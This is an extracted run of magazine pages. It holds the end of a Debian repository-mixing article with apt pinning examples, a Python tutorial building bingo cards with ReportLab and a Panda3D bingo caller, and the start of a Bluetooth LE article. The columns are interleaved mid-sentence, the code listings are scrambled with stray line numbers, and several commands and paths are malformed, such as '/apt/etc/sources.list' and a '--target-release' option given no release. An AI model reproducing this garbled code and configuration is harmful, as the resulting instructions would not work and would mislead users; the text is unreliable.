option --no-install-recommends and Package: * would never be used. You might also
avoid --install-suggests to keep the mix Pin: release a=stable add other repositories, as well as entries
as simple as possible. Pin-Priority: 900 for individual packages with stand-
alone dependencies, or packages that
Ways to Mix Repositories Package: * your system depends upon or of which
Debian systems install from the reposito- Pin: release a=testing you always want to have the latest ver-
ries list in /etc/apt/sources.list. If you Pin-Priority: 600 sion. The preference file can be a work
want packages from contrib or non-free, in progress or kept as simple as in the
you will need to add the sections to each Package: * example above and promptly ignored.
source in a text editor and then run apt Pin: release a=unstable The command apt-cache policy will
update to enable the new sources. By de- Pin Priority: 300 display your current preferences. Figure
fault, the most recent sources are used 3 shows the default preferences, which
when installing, so testing is used in pref- This file will choose any package from give all the repositories from stable
erence to stable, and unstable is used in stable first, then from testing if a stable equal priority, assuring that the latest
preference to testing. version is unavailable, and then from version is always used.
Repositories can be mixed after you unstable if a testing version is unavail- The preferred method for many ex-
add testing and unstable repositories able. Any repository with a priority of 0 perts is to enable all three basic
to sources.list; then run apt update.
However, given Debian’s priorities,
that alone will leave your system wide
open to disaster. A more reasonable
approach is to comment out testing
and unstable until you need them, and
re-comment the entries as soon as you
are finished. The only weakness with
this method is that you might forget to
comment out a repository when tem-
porarily finished with it.
Another method is to create a preference
file in /etc/apt, setting a three-digit prior-
ity for each repository or package. Priori- Figure 2: It is often useful to see which other packages depend on the
ties can be set for all packages or for indi- one you are going to mix. Shown here is the start of the reverse depen-
vidual packages. A simple preference file dencies for GCC – which are so numerous that GCC is a poor candidate
would be: for mixing because the chances are high that something can go wrong.

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 59

IN-DEPTH
Mixing Debian Repositories

Table 1: apt-get options to recover from mixing backup, or when all else fails, to do a
Warning: These options can make a broken system worse. Consult the apt-get complete reinstall.
man page to be sure you know what you are doing.
--fix-broken (-f) Instruct apt-get to attempt repair on its own. Other Mixes
I have been talking about mixes within
--ignore-missing, --fix-missing (-m) Ignore missing or corrupted packages and try to
Debian. However the same problem can
install the rest.
arise from borrowing from a Debian deriv-
--allow-downgrades Attempts to install an earlier version of packages.
ative. In its earliest days, a derivative dis-
--purge Remove all mentions of removed packages. tribution can often be added successfully
to a Debian system, but over time, deriva-
repositories in /apt/etc/sources.list, bullseye-security or bullseye-updates. tives often diverge. This is especially true
use apt-get with the option --target-re- But note that neither are available for of Ubuntu today. Other derivatives, such
lease or --default-release (-t), and apt, only apt-get. As long as you remem- as Linux Mint Debian Edition, may be
specify the repository you want, either ber to use the option, these methods are more compatible but are still a gamble.
by its code name, as testing, or by its sta- the simplest method of mixing. DEB packages from developers can also
tus as testing or unstable. For example: cause problems, making a Flatpak or Snap
Recovering from Mixing package, or another installer like Home-
apt-get --target-release install xchat If your mixing results in a broken sys- brew, a wiser choice. Just because a pack-
tem, apt-get/apt will suggest possible age is in a compatible format is not a guar-
Alternatively, you can use the structure: solutions, starting with an automatic at- antee that it is problem-free. Take the time
tempt to find a solution. If that fails, do to be cautious, and you can save yourself
apt-get install xchat/unstable not reboot your system before you have hours of frustration. Q Q Q
exhausted your efforts at recovery.
Either structure overrides a preference Table 1 shows the options that apt-get – Info
file and can also be used to favor any but not apt – offer to help recovery. An- [1] Reinstall: https://forums.debian.net/
other repository, such as other option is to restore a current viewtopic.php?&t=114130

Figure 3: The default priorities for repositories for bullseye, the stable version of Debian 11, assure that the
latest version is used.

QQQ

60 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

MAKERSPACE ReportLab and Panda3D

MakerSpace
Program a game of bingo with ReportLab
and Panda3D for Python

Bingo!
A game of bingo illustrates how to use the ReportLab toolkit and Panda3D real-time
3D engine. By Scott Sumner

P
ython is great for a number of else. In Python, that is usually done by elements to the document. Line 15
computing tasks: rapid proto- adding import lines to bring in the librar- starts a loop that iterates through each
typing, quick calculations, and ies you want to use. ReportLab is a very of 25 pages of the PDF so that, when
data formatting, just to name a large library, so its main functions have it's done, you will have 100 bingo
few. If the output of your perfect project been divided into smaller modules. This cards (four per page). Each page has
needs to be more polished or ready to re- way, you can import just what you need. the four grids, header rows for each
view immediately, you can use two librar- The syntax is card, and random numbers in all
ies to generate unique outputs directly spaces except the labeled free space in
from Python. The ReportLab [1] toolkit from [library] import [module] the center (lines 16-19). I explore each
generates PDF files, and Panda3D [2] of these functions more later. Finally,
creates a Python-controllable 3D world (lines 1-4, 6, 7). Line 5
for dynamic computer graphics. disables some warn-
For the purposes of this project, I will ings when loading
use the game of bingo as an example. To fonts, and lines 6 and 7
begin, a set of bingo cards is generated import the font librar-
with Python and ReportLab (Figure 1), ies, whereas lines 8
then a bingo caller is put together with and 9 actually import
Python and Panda3D. the fonts with pdfmet-
rics.registerFont by-
Bingo Card passing a TTFont ob-
In the US, the bingo card is traditionally ject. The first argu-
a 5x5 grid with the center space “free” ment is an internal
or automatically marked. The card has name that is used to
75 possible numbers, 15 available in refer to the font later.
each column. Listing 1 prints four cards The second argument
per page that can be cut apart. is the TTF filename.
The task of creating a bingo card has To create a PDF,
been divided into several steps – drawing you have to start
with a canvas
Photo by Josh Redd on Unsplash

the grid, adding the titles (top row of the

card), filling each card with random num- (line 14) with a file-
bers, adding the label for the free space – name to write to and
each completed by a Python function. a pagesize. Just as in
art, this is where ev-
Setting Up erything is drawn.
As with any project, you have to set up Once that is set up, Figure 1: One page of the ReportLab output.
your workspace before you can do much you can start adding Each page contains four bingo cards.

62 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 ReportLab and Panda3D MAKERSPACE

Listing 1: bingo.py
01 from reportlab.pdfgen import canvas 52 return card
02 from reportlab.lib.pagesizes import letter 53
03 from reportlab.lib.units import inch 54 def freeSpace ( self ):
04 import reportlab.rl_config
55 self.doc.setFont ( "Bebas" , 24 )
05 reportlab.rl_config.warnOnMissingFontGlyphs = 0
56 self.doc.drawString
06 from reportlab.pdfbase import pdfmetrics
( 1.95 * inch , 7.55 * inch , "FREE" )
07 from reportlab.pdfbase.ttfonts import TTFont
57 self.doc.drawString
08 pdfmetrics.registerFont(TTFont('Bebas',
( ( 1.95 + 4.1 ) * inch , 7.55 * inch , "FREE" )
'BebasNeue-Regular.ttf'))
58 self.doc.drawString ( ( 1.95 ) * inch ,
09 pdfmetrics.registerFont ( TTFont ( 'Titan' ,
'TitanOne-Regular.ttf' ) ) ( 7.55 - 4.9 ) * inch , "FREE" )

10 import random 59 self.doc.drawString ( ( 1.95 + 4.1 ) * inch ,

11 ( 7.55 - 4.9 ) * inch , "FREE" )

12 class bingo: 60
13 def __init__ ( self ): 61 def numbers ( self ):
14 self.doc = canvas.Canvas ( "bingoCards.pdf" , 62 card1 = self.makeCard()
pagesize = letter )
63 card2 = self.makeCard()
15 for i in range ( 25 ):
64 card3 = self.makeCard()
16 self.grid()
17 self.titles() 65 card4 = self.makeCard()

18 self.numbers() 66 self.doc.setFont ( "Bebas" , 45 )

19 self.freeSpace() 67
20 self.doc.showPage() 68 y = 9.05
21 self.doc.save() 69 for i in range ( 25 ):
22
70 if i == 12:
23 def grid ( self ):
71 y -= .7
24 self.doc.setStrokeColorRGB ( 0 , 0 , 0 )
72 continue
25 for x in range ( 12 ):
26 for y in range ( 14 ): 73

27 if x != 5 and x != 11: 74 if i < 5: x = 0

28 self.doc.line ( ( x * .68 + .5 ) * inch , 75 elif i < 10: x = .68

( y * .7 + 1 ) * inch , ( ( x + 1 ) *
76 elif i < 15: x = .68 * 2
.68 + .5 ) * inch , ( y * .7 + 1 ) *
inch ) 77 elif i < 20: x = .68 * 3
29 if y != 7 and y != 0: 78 elif i < 25: x = .68 * 4
30 self.doc.line ( ( x * .68 + .5 ) * inch , 79
( y * .7 + 1 ) * inch , ( x * .68 + .5 )
* inch , ( ( y - 1 ) * .7 + 1 ) * inch ) 80 if card1 [ i ] < 10: spacing = .15

31 81 else: spacing = 0
32 def titles ( self ): 82 self.doc.drawString ( ( x + .57 + spacing ) *
33 self.doc.setFont ( "Titan" , 50 ) inch , ( y - .25 ) * inch , str ( card1 [ i ] ) )
34 self.doc.drawString 83
( .60 * inch , 9.5 * inch , "B I N G O" )
84 if card2 [ i ] < 10: spacing = .15
35 self.doc.drawString
( 4.68 * inch , 9.5 * inch , "B I N G O" ) 85 else: spacing = 0

36 self.doc.drawString 86 self.doc.drawString
( .60 * inch , 4.6 * inch , "B I N G O" ) ( ( x + 4.65 + spacing ) * inch , ( y - .25 )
37 self.doc.drawString * inch , str ( card2 [ i ] ) )
( 4.68 * inch , 4.6 * inch , "B I N G O" )
87
38
88 if card3 [ i ] < 10: spacing = .15
39 def makeCard ( self ):
89 else: spacing = 0
40 card = list()
90 self.doc.drawString
41 for i in range ( 25 ):
( ( x + .57 + spacing ) * inch , ( y - 5.1 ) *
42 while 1:
inch , str ( card3 [ i ] ) )
43 if i < 5: number = random.randint ( 1 , 15 )
91
44 elif i < 10: number = random.randint ( 16 ,
30 ) 92 if card4 [ i ] < 10: spacing = .15

45 elif i < 15: number = random.randint ( 31 , 93 else: spacing = 0

45 )
94 self.doc.drawString
46 elif i < 20: number = random.randint
( ( x + 4.65 + spacing ) * inch , ( y - 5.1 )
( 46 , 60 )
* inch , str ( card4 [ i ] ) )
47 elif i < 25: number = random.randint ( 61 ,
75 ) 95

48 96 y -= .7

49 if number not in card: 97 if i == 4 or i == 9 or i == 14 or i == 19:

50 card.append ( number ) y = 9.05

51 break 98 bingo()

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 63

MAKERSPACE ReportLab and Panda3D

call self.doc.showPage (line 20) to add cards per page, those numbers are dou- the parameters are different, in order to
the page to the PDF and reset for the bled. Adding an empty row and column label each center square "FREE".
next page. Line 21 calls self.doc.save, between each card gives a total of 11 col-
which writes everything to disk. umns and 13 rows. The makeCard Function
To start drawing, set the line color with The makeCard function doesn’t actually
The Grid self.doc.setStrokeColorRGB, which will draw the card; rather, it creates the list of
With the bingo grid being five rows tall stay the same until changed again. Then numbers in the appropriate ranges for
and five columns wide, it also needs a lines 25 and 26 set up two loops: one for x each column. Line 40 initializes card as a
header row, for a total of six rows. By and one for y. Note that the loop ranges list, then line 41 sets up a loop that
creating a 2x2 “grid of grids” for four are 12 and 14 instead of 11 and 13 because runs 25 times, once for each square in
in Python range stops one below the pro- the grid. The next line starts an infinite
Units and Dimensions vided number. Lines 27 and 29 check the x loop until lines 43-47 find a number not
and y values, respectively, and skip the currently on the card.
ReportLab is inherently unitless. The
internal numbers used to generate center and end rows and columns. This Each if … random.randint line picks
PDFs only correspond to themselves. way you have four cards rather than one numbers in the right range for each col-
Those numbers translate into recogniz- big grid. Lines 28 and 30 draw a line umn. Line 49 checks that the number is
able units with the reportlab.lib.units from calculated values with self.doc. not on the card already, adds it to the list
library, which defines several constants
line, which expects the parameters start- (line 50), and then exits the infinite loop
(e.g., inch and millimeter) that make
any number passed in to a ReportLab ing x, starting y, ending x, and ending y, (line 51). Finally, line 52 returns card,
function scale to the proper real-world in that order. You will also notice * inch in which now has a unique set of numbers
size. Any time you pass a numerical di- every coordinate. See the sidebar “Units for the bingo card.
mension to ReportLab, it is multiplied and Dimensions” for more about this.
by the appropriate constant – for exam-
ple, 8.5 * inch.
The numbers Function
Similarly, the reportlab.lib.pagesizes
titles and freeSpace The numbers function draws the cards to the
library has common paper sizes. Functions document. To begin, it calls self.makeCard
Whereas letter is common in the US at The header row of each card is the first four times to get the numbers for each card.
8.5 inches wide and 11 inches tall, in place a font is needed, so the titles sec- Then, self.doc.setFont (line 66) assigns
other parts of the world, A4 is the stan- tion starts with self.doc.setFont in line 33, the font to be used to draw the numbers.
dard at 210mm wide and 297mm tall.
asking ReportLab to use a font previously Line 68 sets y = 9.05. The origin of the
Similarly, the terms “portrait” and
“landscape” in the US refer to the ori- loaded – on line 9 in this case. The first pa- document is the lower left of the page,
entation of the paper. Portrait lays out rameter is the internal name of the font to so this location is near the top.
the longer dimension vertically, be used (as provided when it was loaded), On line 69, the for loops over a range
whereas landscape lays out the longer and the second parameter is its size. of 25, one for each space on the grid. If i
dimension horizontally.
For each self.doc.drawString, you pro- == 12 (line 70), then this is the free
As you can see, ReportLab gives you vide the x and y coordinates and the text space. All you do is move down to the
the tools to create nice PDFs with just
to be drawn. In this case, BINGO, with next square (line 71) then continue with
about any content you might use. You
can put this to use in data processing, extra spaces between the letters so the font the next iteration of the loop (line 72).
batch scripts, or just about anything will line up inside the grid. This command Lines 74-78 determine the x offset for
else to create an easy-to-read report is repeated four times, once for each card. the column. This value will be added to
that is generated as your files or data The freeSpace function (lines 54-59) a hard-coded x value for each of the four
are being processed.
works exactly the same as titles. Only cards on the page.

Listing 2: bingoCaller.py
001 from direct.showbase.ShowBase import ShowBase 016 import os

002 017 import sys

003 from panda3d.core import WindowProperties 018 import thread

004 from panda3d.core import TextNode 019

005 from panda3d.core import NodePath 020 class bingo ( ShowBase ):

006 from panda3d.core import Point3 021 def __init__ ( self ):

007 from panda3d.core import DynamicTextFont 022 ShowBase.__init__ ( self )

008 023 wp = WindowProperties()

009 from direct.interval.LerpInterval import LerpPosInterval 024 wp.setFullscreen(1)

010 from direct.interval.IntervalGlobal import * 025 wp.setSize(1280, 720)

011 026 base.openMainWindow()

012 from direct.task import Task 027 base.win.requestProperties(wp)

013 028 base.graphicsEngine.openWindows()

014 import pprint 029 base.disableMouse()

015 import random 030 self.auto = False

64 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 ReportLab and Panda3D MAKERSPACE

Listing 2: bingoCaller.py Continued

031 self.calledTiles = list() 087 self.text3d.reparentTo(self.render)

032 088 self.text3d.setScale(.8)

033 base.camera.setPos( 40, -85, 15 ) 089 if tile [ 0 ] == "B": x = 25
034 090 elif tile [ 0 ] == "I": x = 28
035 font = loader.loadFont ( "TitanOne-Regular.ttf" ) 091 elif tile [ 0 ] == "N": x = 31
036 font.setPixelsPerUnit ( 240 ) 092 elif tile [ 0 ] == "G": x = 34
037 093 elif tile [ 0 ] == "O": x = 37
038 self.text= TextNode('text') 094
039 self.text.setText( "BINGO" ) 095 if oldLetter != tile [ 0 ]:
040 self.text.setTextColor(1,1,1,1) 096 z = 20
041 self.text.font = font 097 oldLetter = tile [ 0 ]
042 098
043 self.text3d = NodePath(self.text)
099 self.text3d.setPos( x , -50 , z )
044 self.text3d.reparentTo(self.render)
100 self.text3d.setTwoSided(True)
045 self.text3d.setScale(.8)
101 z -= 1
046 self.text3d.setPos( 39 , -75 , 17 )
102 self.tiles3d [ tile ] = self.text3d
047
103 random.shuffle ( self.tiles )
048 self.initTiles()
104
049 self.accept ( "q" , sys.exit )
105 def callTile ( self , manual = False ):
050 self.accept ( "c" , self.callTile , [ True ] )
106 if self.auto == False and manual == False: return
051 self.accept ( "a" , self.autoCall )
107
052 self.accept ( "space" , self.stopAuto )
108 if len ( self.tiles) > 0: tile = self.tiles.pop()
053 self.accept ( "r" , self.reset )
109 else: return
054
110
055 def autoCall ( self ):
111 startPos = self.tiles3d [ tile ].getPos()
056 self.auto = True
112 newPos = Point3 ( startPos [ 0 ] + 17 , startPos [
057 taskMgr.doMethodLater ( 5 , self.callTile , "Call
1 ] , startPos [ 2 ] )
Bingo" , extraArgs = [] )
113
058
114 i = LerpPosInterval ( self.tiles3d [ tile ] , 2 ,
059 def stopAuto ( self ):
Point3 ( 39.4 , -82 , 14.7 ) )
060 self.auto = False
115 park = LerpPosInterval ( self.tiles3d [ tile ] , 2
061 , newPos )
062 def getCam ( self ): 116
063 pprint.pprint ( base.camera.getPos() ) 117 Sequence ( i , Wait ( 1 ) , park ).start()
064 118 thread.start_new_thread ( self.speak , ( tile , )
065 def initTiles ( self ): )
066 self.tiles = list() 119
067 self.tiles3d = dict() 120 self.calledTiles.append ( tile )
068 121 if self.auto == True: self.autoCall()
069 bingoWord = "BINGO" 122
070 total = 0 123 def speak ( self , string ):
071 for char in bingoWord: 124 os.system ( "espeak " + string )
072 for i in range ( 15 ): 125
073 self.tiles.append ( char + str ( i + total 126 def reset ( self ):
+ 1 ) )
127 resetParallel = Parallel()
074 total += 15
128 for obj in self.calledTiles:
075
129 pos = self.tiles3d [ obj ].getPos()
076 font = loader.loadFont ( "TitanOne-Regular.ttf" )
130 newPos = Point3 ( pos [ 0 ] - 17 , pos [ 1 ] ,
077 font.setPixelsPerUnit ( 240 )
pos [ 2 ] )
078
131 resetParallel.append ( LerpPosInterval ( self.
079 oldLetter = "" tiles3d [ obj ] , 2 , newPos ) )
080 for tile in self.tiles: 132 if obj not in self.tiles: self.tiles.append (
081 self.text= TextNode('text') obj )

082 self.text.setText( tile ) 133 resetParallel.start()

083 self.text.setTextColor(1,1,1,1) 134 random.shuffle ( self.tiles )

084 self.text.font = font 135

085 136 game = bingo()

086 self.text3d = NodePath(self.text) 137 game.run()

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 65

MAKERSPACE ReportLab and Panda3D

Bingo Caller
As with any Python program, you have
to import the appropriate libraries. Pan-
da3D splits all of its functions into subli-
braries, so you will have a number of
imports just for those (Table 1).
As with any Python program, __init__
is called automatically when a class is in-
stantiated. Here it is used to set up the
Panda3D environment, starting with call-
ing ShowBase.__init__ ( self ) (line 22),
which gives the bingo class all of the vari-
ables, functions, and set up associated
with ShowBase or Panda3D.
By default Panda3D opens a normal
desktop window. To get the application to
run fullscreen, though, you need to do a
Figure 2: The initial layout of the bingo caller display. Tiles on the left little bit of setup. Line 23 creates a Win-
have not yet been called. dowProperties object, which allows you to
call wp.setFullscreen (line 24) to request
Lines 80 and 81 handle character spac- working on a computer, most of us are a fullscreen window and wp.setSize to re-
ing. If the index i is less than 10, the only worried about two dimensions quest the screen resolution.
number on the card will be a single digit. when trying to get something to show As mentioned earlier, Panda3D opens
In this case, spacing is set to .15 so the up in the right place onscreen. In three a window by default, but in this case,
number is centered; otherwise, the num- dimensions, though, you add depth you need to force it to open now with
ber is two digits, so spacing is 0. (the distance from the camera or view- base.openMainWindow (line 26) and then
Line 82 uses drawString with the cal- point) and height off the ground. apply the WindowProperties object cre-
culated x and y positions to fill in the Think of your 3D canvas like your ated above with base.win.requestProper-
card with the number. Lines 80-82 are living room. Imagine you are sitting on ties (line 27). Finally, you ask the
reproduced for each of the four cards a couch, viewing a coffee table, a TV, graphics engine to draw the windows
in lines 84-94. and all of the decorations that make up onscreen with base.graphicsEngine.open-
Line 96 moves the y value down for the your home. If you move to a different Windows (line 28).
next row, and line 97 checks to see if the place in the room, the objects look dif- The next line calls base.disable-
bottom of a column has been reached. If ferent. You can also put objects on a Mouse. Panda3D includes by default a
so, then y is reset to the top of the page. shelf or table to change their height. set of built-in controls to let you ex-
All of these factors have to be consid- plore the Panda3D world. The mouse
Panda3D ered when working in a 3D environ- controls your orientation (where you
Now that you have a set of bingo ment. Luckily Panda3D hides a lot of are looking), and keyboard keys move
cards, it’s time to play the game. How- the inner workings and makes it easy you forward, back, left, and right. In
ever, it’s no fun choosing one of your to set everything up. this case, though, you want to control
friends to sit out and
call the numbers, so I Table 1: bingoCaller.py Imports
created an auto-
Line No. Import Function
mated, visually inter-
1 ShowBase Main Python interface to Panda3D
esting bingo caller
3-7 panda3d.core
(Figure 2) that uses
3 WindowProperties Controls the window showing the Panda3D project
the Panda3D library,
4 TextNode Creates text objects
a 3D rendering and
5 NodePath Panda3D internal object references
graphics environment
6 Point3 Represents a 3D point
(Listing 2). The pro-
7 DynamicTextFont Loads TTF fonts
gram also uses the
9 direct.interval.LerpInterval Lerps are the Panda3D movement controllers
eSpeak speech syn-
10 direct.interval.IntervalGlobal Allows things to happen over a period of time
thesizer to call the
12 direct.task Recurrent tasks after a specific period of time
numbers.
14 pprint Prints nicely formatted strings (mainly for debugging)
When you are
15 random Gets numbers in an arbitrary order
working in a 3D envi-
16 os Calls functions in the underlying operating system
ronment, you have to
17 sys Used for sys.exit to close the program on request
shift your thinking a
18 thread Runs multiple portions of the program concurrently
little bit. When

66 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 ReportLab and Panda3D MAKERSPACE

the camera position automatically. If render with setText (line 39). The set- doMethodLater (line 57) sets up a func-
you do not disable the mouse, the cam- TextColor in line 40 is what it sounds tion to be called in the future. The argu-
era commands will be ignored. like, but its arguments are a little differ- ment list is how long to wait (five sec-
If you were writing an interactive ent: Instead of arguments for red, onds), what to call (self.callTile), an
game, you could allow the player to trig- green, blue, and alpha being mapped internal label (Call Bingo), and any
ger an in-game animation sequence to from 0 to 255, they are mapped from 0 extra arguments (empty list=none).
introduce the next level. Once you dis- to 1. All 1 entries get you white. Finally Lines 59 and 60 stop the auto calling by
able the mouse, you can do whatever self.text.font = font assigns the font setting self.auto to False.
you want to move the user around, make loaded on line 35.
them look in a certain direction, and so So far this is only a 2D text object. The Enable Mouse
on. Once you have told your part of the next set of lines puts it in three dimen- When setting up a 3D world it is often
story, you use enableMouse to return con- sions. A node is an object in Panda 3D’s just easier to drive the camera around
trol and allow the user to keep exploring. internal library, so NodePath(self.text) and find the object you are looking for.
Lines 30 and 31 set some variables (line 43) gets the address of the text node To do so, remove the disableMouse on
that are used later: self.auto is a flag just created. On line 44, then, the re- line 29 so you can use the built-in cam-
that indicates whether numbers are cur- parentTo assigns it to self.render. In Pan- era controls. Once you have found
rently being called, and self.calledTiles da3D anything attached to self.render is your object, call getCam, which uses
is a list of bingo numbers that have been rendered as a 3D object. Now that it is in pprint (line 63) to output the camera
called. More on these a little later. the 3D realm, a setScale (line 45) sets the position, which can then be added to
Line 33 sets the initial camera posi- text size, and setPos (line 46) positions it the code as needed.
tion with base.camera.setPos. Just like in the 3D world in front of the camera.
setting up a camera in the real world, Line 48 calls initTiles, which creates Tiles
the coordinates are relative to the ob- the numbers that fly around the screen, The initTiles section (lines 65-103) cre-
jects set in the scene. You need the but more on that a little further along. ates all of the 3D objects that represent
camera to be a little ways back so that The last section is lines 49-53, where a bingo numbers and shuffles them to pre-
it can see everything. few self.accept lines set up keyboard pare for calling. To start, self.tiles (line
Line 35 loads the custom font; loader. input. The first argument is the key to 66) is a list of strings that represent the
loadFont makes a TTF file available for trigger a response, and the second argu- tiles, and self.tiles3d (line 67) is a dic-
converting into a 3D object. The internal ment is the function to call when it is tionary of 3D objects. The key is the
resolution of the font just loaded is set pressed. The optional third argument is string from the self.tiles list.
by setPixelsPerUnit on line 36. By de- a list of parameters to pass to the func- Bingo tiles start with one letter from the
fault, the resolution is a fairly low value tion when the key is pressed. Line 50 word “BINGO” and then one of 15 num-
(Figure 3), which is fine if the text will says, “watch for the c key to be pressed, bers. Column 1 (B) goes from 1 to 15, col-
be far away. However, the text will be and when it is, run self.callTile and umn 2 (I) from 16 to 30, and so on.
moved very close to the camera, so the give it the parameter True”. Line 69 creates bingoWord = "BINGO", and
value needs to be turned up to get a line 70 initializes total to 0. Line 71 loops
sharper line when up close. Automatic Calling over each character in bingoWord and cre-
To create a 3D text object, in this case The autoCall function enables auto- ates 15 tiles for each (line 72). The next
“BINGO” for the top of the screen, matic bingo calling. To start, self.auto line then creates the tile by starting with
TextNode (line 38) contains the text to is set to True (line 56), then taskMgr. char, the current character from bingoWord,
and appending a number created by the
loop counter i plus the accumulated total
plus 1 (otherwise it would start at 0). Once
that is done, total increments by 15 before
the loop moves on to the next column.
Lines 76 and 77 are identical to the
earlier code in __init__ to load a font.
Although the same font loads here, it is
included again so that the tiles can be a
different font from the title.
Now that you have a list of tiles, they
are all turned into 3D objects. Line 79
initializes oldLetter to blank, then line
80 starts the loop over self.tiles. Lines
81-88 create a 3D text object the same
way as in __init__, then lines 89-93
check which column a tile is in from its
Figure 3: This text was rendered with a pixels-per-unit size of 8. As first letter (tile [ 0 ]) and assigns the x
you can see, the tile number N40 is barely recognizeable. for each column.

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 67

MAKERSPACE ReportLab and Panda3D

Line 95 checks to see whether oldLetter (Figure 4) and say the name of the tile with the same y and z coordinates calcu-
has changed (have you moved to the next before it flies back down to the other lated on line 112.
column?), and if so, lines 96 and 97 set side of the screen to show what is now After that, the lerps (linear interpola-
z=20 and update oldLetter. Once that is a called number (Figure 5). tions) need to be set up. The lerps' job
done, line 99 sets the calculated x and z Line 106 checks self.auto and manual is, for any slice of time, to calculate
values with setPos (line 99). The y coor- to see whether auto calling is currently where the object is located between
dinate is hard-coded at -50 because every- active or whether this was called manu- two positions. By default, a lerp starts
thing is the same distance from the cam- ally. If neither are true, then nothing with the object’s current position, but
era. The setTwoSided line (100) makes it should be done and the line returns. you can override that if needed. The
so that if a letter is flipped around back- Then, len ( self.tiles) > 0 checks to lerp also wants to know where to go
ward it will still look right, before decre- make sure tiles are available. If a tile is and how long it takes to get there. You
menting z (line 101) and adding the tile to available, it is stored in tile; otherwise, can optionally provide arguments to
the self.tiles3d dictionary. it encounters the return (lines 108, 109). change the starting position or starting
Finally, random.shuffle on line 103 Now a couple of things need to be set and ending behavior, or even to pro-
makes sure the tiles are in a random up to move the tile around. Because this vide a function to calculate movement
order. Now it’s time to play bingo! function works on all 60 tiles, the first on the fly.
thing you need to know is the location Line 114 is the lerp to move the bingo
Play Bingo! the tile starts, which you find out by call- number up close to the camera over two
The callTile section (lines 105-121) ing getPos on the 3D tile object stored in seconds. Line 115 uses the newly calcu-
calls the tile, which will fly up close to self.tiles3d (line 111). The new position lated x position and flies the number
the camera so it appears really big of the tile will be the x position plus 17, from right in front of the camera down
to a position on the right-hand side of
the screen.
So far you have told the tile how to
move, but you haven’t actually moved it
yet. You can think of lerps as dance
moves. You can learn how to do each
step, but then you have to put them to-
gether in the right order to perform the
whole dance. That is where Sequence
comes in. It takes a set of lerps and exe-
cutes them in the order provided, so line
117 starts with the lerp i that moves
from the initial position up to the cam-
era. Then the special Wait function de-
lays for the provided number of seconds,
and park finishes in the position on the
right side of the screen where you want
Figure 4: When a number is called, it flies close to the camera and is the tile to land. If this sequence were to
announced by eSpeak. be used repeatedly, you could store it in
a variable, but here, just call start so the
movement begins.
Line 118 calls self.speak in a new
thread, which lets the speech and the
movement happen at the same time.

eSpeak
eSpeak is an open source text-to-
speech engine that you can install with
your distribution’s package manager.
Once installed, open a terminal and
type:
espeak "Hello World!"

Your computer should greet you ver-

bally. When it’s not convenient to dis-
play a debug message, it may be
helpful for your project to literally tell
Figure 5: After a number is called, it moves to the right half of the you what is happening.
screen. Resetting the game will move all numbers to the left again.

68 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 ReportLab and Panda3D MAKERSPACE

To wrap up, append tile to self. self.tiles (line 134) makes sure the • If all tiles are on the right side, the
calledTiles (line 120) and then, if auto tiles are called in a different order in the player has won! Press r to reset the
calling is on (self.auto == True), call next game. board and begin another game.
self.autoCall again (line 121) to sched- Lines 136 and 137 run the program • If the person who called bingo is not a
ule callTile to be run in five seconds. with the bingo instance (line 136) and winner, the player is out and the other
the call to run (line 137), which starts players can continue. Pressing a starts
Speak and Reset Panda3D’s main loop. calling numbers again where you left off.
The speak section (lines 123, 124) uses I trust the two examples in this article
os.system to pass a call to the underlying Bingo! demonstrate how easily both PDFs and
operating system. In this case, it calls Now that you have the software, it’s 3D data can be visualized with the help
espeak to say the name of the tile by pass- time to play a game of Bingo! Here’s of free Python libraries. Now use this
ing in the tile text. (See the “eSpeak” box.) what to do: new knowledge to format your favorite
Once the game is over, you need to • Run bingo.py, then open the generated data in new and exciting ways! Q Q Q
reset everything so you are ready for the PDF and print a page for each player.
next game. Parallel is similar to Se- • Run bingoCaller.py. Once it appears Info
quence, but here everything happens at on your screen, press a to start the [1] ReportLab docs:
the same time (line 127). Then, for auto caller. https://docs.reportlab.com/reportlab/
every tile in self.calledTiles (line 128), • As each number is called, mark it off if userguide/ch1_intro/
you get its position (line 129), calculate it appears on your card. [2] Panda3D: https://www.panda3d.org
its original position (x minus -17; line • When someone has filled in five spaces
130), and append it to Parallel (line horizontally, vertically, or diagonally, Author
131). Finally, you add the tile name they yell “bingo!” and press the space- Scott Sumner has worked in the museum
back to self.tiles so it is available to bar on the computer. The player should and non-profit industry for most of his
be called again. Once all of the tiles then announce each of the five tiles professional career. He enjoys exploring
have been added to Parallel, you start marked on their bingo card while the technology solutions with Arduinos,
it (line 133) – which makes the move- other players make sure they appear on Raspberry Pis, Microcontrollers, and
ment happen on screen. Next, shuffle the right side of the screen. Linux systems.
MAKERSPACE Bluetooth LE

MakerSpace
Bluetooth Low Energy for the
Raspberry Pi

Wireless Saver
Bluetooth Low Energy is ideal for networking battery-
powered sensors. We show you how to use it on the
Raspberry Pi. By Bernhard Bablok

B
luetooth LE, or BLE for short,
getting started with some practical ex-
comes with a whole new amples, I first need to discuss the theo-
world of terms on top of the
retical background. Without all of this
new technology. Before BLE speak, you can’t evaluate the many
application examples avail-
able on the web and adapt
them to your needs.
Bluetooth is a short-range
technology for use between
two devices [1]. Before a con-
nection is established, a sys-
tem can be either a peripheral
device or a central device.
Powerful devices such as PCs,
tablets, and laptops can as-
sume both roles, while less
powerful devices are limited
to the peripheral role.
Each peripheral sends ad-
vertisements at regular inter-
vals, such as “I am sensor
ABC and provide heart rate
data.” Alternatively, the mes-
sage could be: “I am sensor
Lead Image © Teerapat Seedafong, 123RF.com

XYZ and would like to know

the current time.” Heart rate
and current time are services.
Both of them are standard-
ized, but manufacturers are
free to use their own proprie-
tary services. More about that
later.
Figure 1: An example of an advertisement Figure 1 from the Blue-
from the Bluetooth SIG BLE Primer. tooth Special Interest Group
(SIG) [2] BLE Primer shows

70 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 Bluetooth LE MAKERSPACE

that devices use multiple predefined Using these

channels of the spectrum for advertise- UUIDs, a central
ments. (Bluetooth SIG is a special in- instance can filter
